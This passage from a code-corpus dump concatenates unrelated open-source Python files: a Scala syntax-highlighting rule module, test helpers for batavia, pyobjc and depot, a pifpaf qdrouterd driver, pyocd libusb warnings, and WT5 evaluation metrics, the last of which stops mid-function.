def scala_rule7(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"\"\"", end="\"\"\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule8(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule9(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal1", regexp="'([^']|\\\\.)'",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule10(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="label", regexp="'[0-9a-zA-Z><=+]([0-9a-zA-Z><=+]|_[0-9a-zA-Z><=+])*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule11(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="\\[[^\\[\\]]*(\\[[^\\[\\]]*(\\[[^\\[\\]]*\\][^\\[\\]]*)*\\][^\\[\\]]*)*\\]",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule12(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp="<:\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule13(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp=">:\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="!",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule17(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule18(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">:",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule19(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule20(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<:",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule21(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule22(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule23(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule24(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule25(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule26(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule27(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="%",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule28(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="&",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule29(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="|",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule30(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule31(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="`",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule32(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="~",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule33(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule34(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule35(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=".",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule36(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=",",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule37(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=";",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule38(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="]",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule39(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="[",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule40(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule41(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=":",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule42(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp=":\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule43(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def scala_rule44(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="case", end="=>",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::pattern",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule45(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for scala_primary ruleset.
rulesDict2 = {
"!": [scala_rule16,],
"\"": [scala_rule7,scala_rule8,],
"%": [scala_rule27,],
"&": [scala_rule28,],
"'": [scala_rule9,scala_rule10,],
"(": [scala_rule43,],
")": [scala_rule14,],
"*": [scala_rule24,],
"+": [scala_rule21,],
",": [scala_rule36,],
"-": [scala_rule22,],
".": [scala_rule35,],
"/": [scala_rule1,scala_rule2,scala_rule3,scala_rule4,scala_rule23,],
"0": [scala_rule45,],
"1": [scala_rule45,],
"2": [scala_rule45,],
"3": [scala_rule45,],
"4": [scala_rule45,],
"5": [scala_rule45,],
"6": [scala_rule45,],
"7": [scala_rule45,],
"8": [scala_rule45,],
"9": [scala_rule45,],
":": [scala_rule41,scala_rule42,],
";": [scala_rule37,],
"<": [scala_rule5,scala_rule6,scala_rule12,scala_rule19,scala_rule20,scala_rule26,],
"=": [scala_rule15,scala_rule45,],
">": [scala_rule13,scala_rule17,scala_rule18,scala_rule25,scala_rule45,],
"?": [scala_rule40,],
"@": [scala_rule45,],
"A": [scala_rule45,],
"B": [scala_rule45,],
"C": [scala_rule45,],
"D": [scala_rule45,],
"E": [scala_rule45,],
"F": [scala_rule45,],
"G": [scala_rule45,],
"H": [scala_rule45,],
"I": [scala_rule45,],
"J": [scala_rule45,],
"K": [scala_rule45,],
"L": [scala_rule45,],
"M": [scala_rule45,],
"N": [scala_rule45,],
"O": [scala_rule45,],
"P": [scala_rule45,],
"Q": [scala_rule45,],
"R": [scala_rule45,],
"S": [scala_rule45,],
"T": [scala_rule45,],
"U": [scala_rule45,],
"V": [scala_rule45,],
"W": [scala_rule45,],
"X": [scala_rule45,],
"Y": [scala_rule45,],
"Z": [scala_rule45,],
"[": [scala_rule11,scala_rule39,],
"]": [scala_rule38,],
"^": [scala_rule30,],
"`": [scala_rule31,],
"a": [scala_rule45,],
"b": [scala_rule45,],
"c": [scala_rule44,scala_rule45,],
"d": [scala_rule45,],
"e": [scala_rule45,],
"f": [scala_rule45,],
"g": [scala_rule45,],
"h": [scala_rule45,],
"i": [scala_rule45,],
"j": [scala_rule45,],
"k": [scala_rule45,],
"l": [scala_rule45,],
"m": [scala_rule45,],
"n": [scala_rule45,],
"o": [scala_rule45,],
"p": [scala_rule45,],
"q": [scala_rule45,],
"r": [scala_rule45,],
"s": [scala_rule45,],
"t": [scala_rule45,],
"u": [scala_rule45,],
"v": [scala_rule45,],
"w": [scala_rule45,],
"x": [scala_rule45,],
"y": [scala_rule45,],
"z": [scala_rule45,],
"{": [scala_rule34,],
"|": [scala_rule29,],
"}": [scala_rule33,],
"~": [scala_rule32,],
}
# Rules for scala_pattern ruleset.
def scala_rule46(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="@",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
# Rules dict for scala_pattern ruleset.
rulesDict3 = {
"@": [scala_rule46,],
}
# Rules for scala_scaladoc ruleset.
def scala_rule47(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule48(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule49(colorer, s, i):
return colorer.match_span(s, i, kind="markup", begin="<pre>", end="</pre>",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::scaladoc_pre",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule50(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="<!--", end="-->",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule51(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="<<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule52(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule53(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="< ",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule54(colorer, s, i):
return colorer.match_span(s, i, kind="markup", begin="<", end=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="xml::tags",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule55(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for scala_scaladoc ruleset.
rulesDict4 = {
"*": [scala_rule48,],
"0": [scala_rule55,],
"1": [scala_rule55,],
"2": [scala_rule55,],
"3": [scala_rule55,],
"4": [scala_rule55,],
"5": [scala_rule55,],
"6": [scala_rule55,],
"7": [scala_rule55,],
"8": [scala_rule55,],
"9": [scala_rule55,],
"<": [scala_rule49,scala_rule50,scala_rule51,scala_rule52,scala_rule53,scala_rule54,],
"=": [scala_rule55,],
">": [scala_rule55,],
"@": [scala_rule55,],
"A": [scala_rule55,],
"B": [scala_rule55,],
"C": [scala_rule55,],
"D": [scala_rule55,],
"E": [scala_rule55,],
"F": [scala_rule55,],
"G": [scala_rule55,],
"H": [scala_rule55,],
"I": [scala_rule55,],
"J": [scala_rule55,],
"K": [scala_rule55,],
"L": [scala_rule55,],
"M": [scala_rule55,],
"N": [scala_rule55,],
"O": [scala_rule55,],
"P": [scala_rule55,],
"Q": [scala_rule55,],
"R": [scala_rule55,],
"S": [scala_rule55,],
"T": [scala_rule55,],
"U": [scala_rule55,],
"V": [scala_rule55,],
"W": [scala_rule55,],
"X": [scala_rule55,],
"Y": [scala_rule55,],
"Z": [scala_rule55,],
"a": [scala_rule55,],
"b": [scala_rule55,],
"c": [scala_rule55,],
"d": [scala_rule55,],
"e": [scala_rule55,],
"f": [scala_rule55,],
"g": [scala_rule55,],
"h": [scala_rule55,],
"i": [scala_rule55,],
"j": [scala_rule55,],
"k": [scala_rule55,],
"l": [scala_rule55,],
"m": [scala_rule55,],
"n": [scala_rule55,],
"o": [scala_rule55,],
"p": [scala_rule55,],
"q": [scala_rule55,],
"r": [scala_rule55,],
"s": [scala_rule55,],
"t": [scala_rule55,],
"u": [scala_rule55,],
"v": [scala_rule55,],
"w": [scala_rule55,],
"x": [scala_rule55,],
"y": [scala_rule55,],
"z": [scala_rule55,],
"{": [scala_rule47,],
}
# Rules for scala_scaladoc_pre ruleset.
# Rules dict for scala_scaladoc_pre ruleset.
rulesDict5 = {}
# Rules for scala_xml_tag ruleset.
def scala_rule56(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule57(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule58(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="{", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::main",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule59(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule60(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">\\s*;",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule61(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">\\s*\\)",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule62(colorer, s, i):
return colorer.match_seq(s, i, kind="literal3", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_text")
# Rules dict for scala_xml_tag ruleset.
rulesDict6 = {
"\"": [scala_rule56,],
"'": [scala_rule57,],
">": [scala_rule59,scala_rule60,scala_rule61,scala_rule62,],
"{": [scala_rule58,],
}
# Rules for scala_xml_text ruleset.
def scala_rule63(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="{", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::main",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule64(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="<!--",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_comment")
def scala_rule65(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="<\\/?\\w*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_tag")
# Rules dict for scala_xml_text ruleset.
rulesDict7 = {
"<": [scala_rule64,scala_rule65,],
"{": [scala_rule63,],
}
# Rules for scala_xml_comment ruleset.
def scala_rule66(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="-->$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule67(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="-->\\s*;",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule68(colorer, s, i):
return colorer.match_seq(s, i, kind="comment2", seq="-->",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_text")
# Rules dict for scala_xml_comment ruleset.
rulesDict8 = {
"-": [scala_rule66,scala_rule67,scala_rule68,],
}
# x.rulesDictDict for scala mode.
rulesDictDict = {
"scala_main": rulesDict1,
"scala_pattern": rulesDict3,
"scala_primary": rulesDict2,
"scala_scaladoc": rulesDict4,
"scala_scaladoc_pre": rulesDict5,
"scala_xml_comment": rulesDict8,
"scala_xml_tag": rulesDict6,
"scala_xml_text": rulesDict7,
}
# Import dict for scala mode.
importDict = {
"scala_main": ["scala_main::primary",],
"scala_pattern": ["scala_pattern::primary",],
}
|
tests/utils/method_test_case.py | VeliborKrivokuca/batavia | 1,256 | 11178330 |
from .adjust_code import adjust
from .expected_failure import NotImplementedToExpectedFailure
from .samples import SAMPLE_DATA, SAMPLE_SUBSTITUTIONS
def _one_arg_method_test(name, module, cls_, f, examples):
def func(self):
self.assertOneArgMethod(
name=name,
module=module,
cls_name=cls_,
method_name=f,
arg_values=examples,
substitutions=getattr(self, 'substitutions', SAMPLE_SUBSTITUTIONS)
)
return func
class MethodTestCase(NotImplementedToExpectedFailure):
def assertOneArgMethod(self, name, module, cls_name, method_name, arg_values, substitutions, **kwargs):
self.assertCodeExecution(
'##################################################\n'.join(
adjust("""
try:
print('>>> import {m}')
print('>>> obj = {m}.{c}()')
print('>>> f = obj.{f}')
print('>>> x = {a}')
print('>>> f(x)')
import {m}
obj = {m}.{c}()
f = obj.{f}
x = {a}
print(f(x))
except Exception as e:
print('///', type(e), ':', e)
print()
""".format(m=module, c=cls_name, f=method_name, a=arg))
for arg in arg_values
),
'Error running {} module {}'.format(module, name),
substitutions=substitutions,
run_in_function=False,
**kwargs
)
@classmethod
def add_one_arg_method_tests(test_cls, module, cls_name, functions):
for func in functions:
for datatype, examples in SAMPLE_DATA.items():
name = 'test_{}_{}_{}_{}'.format(
module, cls_name, func, datatype
)
setattr(
test_cls,
name,
_one_arg_method_test(name, module, cls_name, func, examples)
)
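# Illustrative usage sketch (hypothetical names): a concrete test case mixes
# MethodTestCase into a base that provides assertCodeExecution, then registers
# one generated test per datatype in SAMPLE_DATA:
#
#   class UUIDMethodTests(MethodTestCase, SomeTranspileTestCase):
#       pass
#
#   UUIDMethodTests.add_one_arg_method_tests('uuid', 'UUID', ['__eq__'])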
|
pifpaf/drivers/qdrouterd.py | OmarTrigui/pifpaf | 181 | 11178345 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pifpaf import drivers
class QdrouterdDriver(drivers.Driver):
DEFAULT_PORT = 5672
DEFAULT_ARTEMIS_PORT = 5673
DEFAULT_USERNAME = "pifpaf"
DEFAULT_PASSWORD = "<PASSWORD>"
DEFAULT_DOMAIN = "localhost"
def __init__(self, port=DEFAULT_PORT,
artemis_port=DEFAULT_ARTEMIS_PORT,
username=DEFAULT_USERNAME,
                 password=DEFAULT_PASSWORD,
domain=DEFAULT_DOMAIN,
mesh=False,
direct_notify=False,
**kwargs):
"""Create a new Qdrouterd instance."""
super(QdrouterdDriver, self).__init__(templatedir="qdrouterd",
**kwargs)
self.port = port
self.artemis_port = artemis_port
self.username = username
self.password = password
self.domain = domain
self.mesh = mesh
self.direct_notify = direct_notify
@classmethod
def get_options(cls):
return [
{"param_decls": ["--port"],
"type": int,
"default": cls.DEFAULT_PORT,
"help": "port to use for Qdrouterd"},
{"param_decls": ["--artemis_port"],
"type": int,
"default": cls.DEFAULT_ARTEMIS_PORT,
"help": "port to use for broker link"},
{"param_decls": ["--mesh"],
"is_flag": True,
"help": "TODO: Create a 3 HA node mesh"},
{"param_decls": ["--direct_notify"],
"is_flag": True,
"help": "direct message notify and do not attach to broker"},
{"param_decls": ["--username"],
"default": cls.DEFAULT_USERNAME,
"help": "sasl username"},
{"param_decls": ["--password"],
"default": cls.DEFAULT_PASSWORD,
"help": "sasl password"},
{"param_decls": ["--domain"],
"default": cls.DEFAULT_DOMAIN,
"help": "sasl domain"},
]
def saslpasswd2(self, username, password, sasl_db):
self._exec(["saslpasswd2", "-c", "-p", "-f",
sasl_db, username], stdin=password.encode())
def _setUp(self):
super(QdrouterdDriver, self)._setUp()
# setup log, etc used by qdrouterd
logdir = os.path.join(self.tempdir, "log")
os.makedirs(logdir)
etcdir = os.path.join(self.tempdir, "etc")
os.makedirs(etcdir)
sasldir = os.path.join(etcdir, "sasl2")
os.makedirs(sasldir)
logfile = os.path.join(logdir, "qdrouterd.log")
template_env = {
"TMP_DIR": self.tempdir,
"PORT": self.port,
"ARTEMIS_PORT": self.artemis_port,
"SASL_DIR": sasldir,
"LOG_FILE": logfile,
"DIRECT_NOTIFY": self.direct_notify,
}
qdr_cfg = os.path.join(etcdir, "qdrouterd.conf")
self.template("qdrouterd.conf",
template_env,
qdr_cfg)
sasl_cfg = os.path.join(sasldir, "sasl_qdrouterd.conf")
self.template("sasl_qdrouterd.conf",
template_env,
sasl_cfg)
sasl_db = os.path.join(sasldir, "qdrouterd.sasldb")
self.saslpasswd2(self.username, self.password, sasl_db)
c, _ = self._exec(["qdrouterd", "-c", qdr_cfg],
wait_for_port=self.port)
self.putenv("QDROUTERD_PORT", str(self.port))
self.putenv("QDROUTERD_URL", "amqp://localhost:%s" % self.port)
self.putenv("URL", "amqp://%s:%s@localhost:%s" % (
self.username, self.password, self.port))
|
mac/pyobjc-core/PyObjCTest/test_convenience.py | albertz/music-player | 132 | 11178366 | from PyObjCTools.TestSupport import *
import objc
import objc._convenience as convenience
class TestConvenienceHelpers (TestCase):
def test_add_for_selector(self):
methods = [
('add', lambda self, x: self.testMethod_(x))
]
with filterWarnings("error", DeprecationWarning):
self.assertRaises(DeprecationWarning, objc.addConvenienceForSelector, b'testMethod:', methods)
        if b'testMethod:' in convenience._CONVENIENCE_METHODS:
            del convenience._CONVENIENCE_METHODS[b'testMethod:']
with filterWarnings("ignore", DeprecationWarning):
self.assertNotIn(b'testMethod:', convenience._CONVENIENCE_METHODS)
try:
objc.addConvenienceForSelector(b'testMethod:', methods)
self.assertEqual(convenience._CONVENIENCE_METHODS[b'testMethod:'], methods)
finally:
                if b'testMethod:' in convenience._CONVENIENCE_METHODS:
                    del convenience._CONVENIENCE_METHODS[b'testMethod:']
def test_add_for_class(self):
self.assertNotIn("MyObject", convenience.CLASS_METHODS)
methods = [
('info', lambda self: self.description())
]
try:
objc.addConvenienceForClass("MyObject", methods)
self.assertEqual(convenience.CLASS_METHODS["MyObject"], methods)
finally:
if 'MyObject' in convenience.CLASS_METHODS:
del convenience.CLASS_METHODS["MyObject"]
class TestBasicConveniences (TestCase):
def testBundleForClass(self):
orig = convenience.currentBundle
try:
the_bundle = object()
def currentBundle():
return the_bundle
convenience.currentBundle = currentBundle
class OC_Test_Basic_Convenience_1 (objc.lookUpClass("NSObject")):
pass
self.assertIs(OC_Test_Basic_Convenience_1.bundleForClass(), the_bundle)
finally:
convenience.currentBundle = orig
def test_kvc_helper(self):
o = objc.lookUpClass('NSURL').URLWithString_('http://www.python.org/')
self.assertEqual(o.host(), 'www.python.org')
self.assertEqual(o._.host, 'www.python.org')
self.assertEqual(o._['host'], 'www.python.org')
self.assertRaises(TypeError, lambda: o._[42])
self.assertEqual(repr(o._), '<KVC accessor for %r>'%(o,))
self.assertRaises(AttributeError, getattr, o._, 'nosuchattr')
self.assertRaises(TypeError, o._.__setitem__, 42)
o = objc.lookUpClass('NSMutableDictionary').dictionary()
o._.key1 = 1
o._['key2'] = 2
self.assertEqual(o, {'key1': 1, 'key2': 2 })
        self.assertRaises(AttributeError, getattr, o._, 'nosuchattr')
self.assertRaises(TypeError, o._.__setitem__, 42)
# TODO: Explicit tests for add_convenience_methods.
if __name__ == "__main__":
main()
|
tests/base_ming.py | tcmike/depot | 128 | 11178377 | from __future__ import absolute_import
import os
import ming
from ming import Session
from ming.odm import ThreadLocalODMSession
from ming import create_datastore
from depot.fields.ming import DepotExtension
mainsession = Session()
DBSession = ThreadLocalODMSession(mainsession, extensions=(DepotExtension, ))
database_setup = False
datastore = None
def setup_database():
global datastore, database_setup
if not database_setup:
datastore = create_datastore(os.environ.get('MONGOURL', 'mim:///depottest'))
mainsession.bind = datastore
        ming.odm.Mapper.compile_all()
        database_setup = True
def clear_database():
global datastore, database_setup
if not database_setup:
setup_database()
try:
# On MIM drop all data
datastore.conn.drop_all()
except TypeError:
# On MongoDB drop database
datastore.conn.drop_database(datastore.db)
|
pyocd/probe/common.py | claymation/pyOCD | 276 | 11178378 | # pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
LOG = logging.getLogger(__name__)
## Whether the warning about no libusb was printed already.
#
# Used to prevent warning spewage if repeatedly scanning for probes, such as when ConnectHelper
# is used in blocking mode and no probes are connected.
did_show_no_libusb_warning = False
## Set of VID/PID tuples for which libusb errors have been reported.
#
# Used to prevent spewing lots of errors for the same devices when repeatedly scanning for probes.
libusb_error_device_set = set()
def show_no_libusb_warning():
"""! @brief Logs a warning about missing libusb library only the first time it is called."""
global did_show_no_libusb_warning
if not did_show_no_libusb_warning:
LOG.warning("STLink, CMSIS-DAPv2 and PicoProbe probes are not supported because no libusb library was found.")
did_show_no_libusb_warning = True
def should_show_libusb_device_error(vidpid):
"""! @brief Returns whether a debug warning should be shown for the given VID/PID pair.
The first time a given VID/PID is passed to this function, the result will be True. Any
subsequent times, False will be returned for the same VID/PID pair.
    @param vidpid A bi-tuple of USB VID and PID, in that order.
"""
should_log = vidpid not in libusb_error_device_set
libusb_error_device_set.add(vidpid)
return should_log
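# Illustrative usage sketch (hypothetical VID/PID values): report a libusb
# failure for a given device only the first time it is seen during probe scans.
#
#   if should_show_libusb_device_error((0x0d28, 0x0204)):
#       LOG.error("could not open USB device 0d28:0204")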
|
wt5/wt5/metrics.py | deepneuralmachine/google-research | 23,901 | 11178381 |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WT5 metrics."""
import numpy as np
import sklearn.metrics
import t5.evaluation
def esnli_metric(targets, predictions):
"""Compute label accuracy and BLEU score for e-SNLI predictions.
This function gets the label and explanation and computes accuracy and
BLEU score on the explanation.
Args:
targets: list of dict of label and explanation
predictions: list of dict of label and explanation
Returns:
a dict with accuracy and bleu score.
"""
def get_label_and_explanation(answers):
"""Helper function to get lists of labels and explanations from a dict."""
labels = []
explanations_1 = []
explanations_2 = []
for answer in answers:
for key, value in answer.items():
if key == "label":
labels.append(value)
# In e-snli, the authors only use the first two explanations to compute
# the BLEU score.
elif key == "explanations":
explanations_1.append("" if not value else value[0])
if len(value) > 1:
explanations_2.append(value[1])
else:
raise RuntimeError(
"Unexpected key:%s provided. to metric fn." % (key))
if explanations_2:
return labels, [explanations_1, explanations_2]
else:
return labels, explanations_1
def get_first_explanation_length(explanations):
return len(explanations) if isinstance(explanations, str) else len(
explanations[0])
target_labels, target_explanations = get_label_and_explanation(targets)
# The model can only predict one explanation
for prediction in predictions:
if prediction["explanations"]:
prediction["explanations"] = [prediction["explanations"][0]]
prediction_labels, prediction_explanations = get_label_and_explanation(
predictions)
return {
"accuracy":
t5.evaluation.metrics.accuracy(target_labels, prediction_labels)
["accuracy"],
"bleu":
t5.evaluation.metrics.bleu(target_explanations,
prediction_explanations)["bleu"],
"expln1_length":
get_first_explanation_length(prediction_explanations)
}
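# Illustrative usage sketch (hypothetical data): each answer dict carries a
# "label" and a list of "explanations"; only the prediction's first
# explanation is scored.
#
#   targets = [{"label": "entailment", "explanations": ["a man is outside"]}]
#   predictions = [{"label": "entailment", "explanations": ["the man is outdoors"]}]
#   esnli_metric(targets, predictions)
#   # -> {"accuracy": ..., "bleu": ..., "expln1_length": ...}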
def extractive_explanations_metric(targets, predictions):
"""Compute label accuracy and macro F1 score for explanations."""
def get_labels_spans_and_expls(answers):
"""Gets a list of labels and spans from a list of dicts."""
labels = []
spans = []
span_arrays = []
explanations = []
for answer in answers:
for key, value in answer.items():
if key == "label":
labels.append(value)
elif key == "overlap_spans":
spans.append(value)
elif key == "span_array":
span_arrays.append(value)
elif key == "explanations":
explanations.append(value)
else:
raise ValueError("Unexpected key found in answers dict: %s" % key)
return labels, spans, span_arrays, explanations
labels_t, spans_t, arrays_t, _ = get_labels_spans_and_expls(targets)
labels_p, spans_p, arrays_p, explns_p = get_labels_spans_and_expls(
predictions)
# Compute f1 score for each example in the target prediction pair
f1_scores = []
for gt_span, pred_span in zip(spans_t, spans_p):
elem_prec = len(set(gt_span)
& set(pred_span)) / len(pred_span) if pred_span else 0
elem_rec = len(set(gt_span)
& set(pred_span)) / len(gt_span) if gt_span else 0
if elem_prec == 0 or elem_rec == 0:
elem_f1 = 0
else:
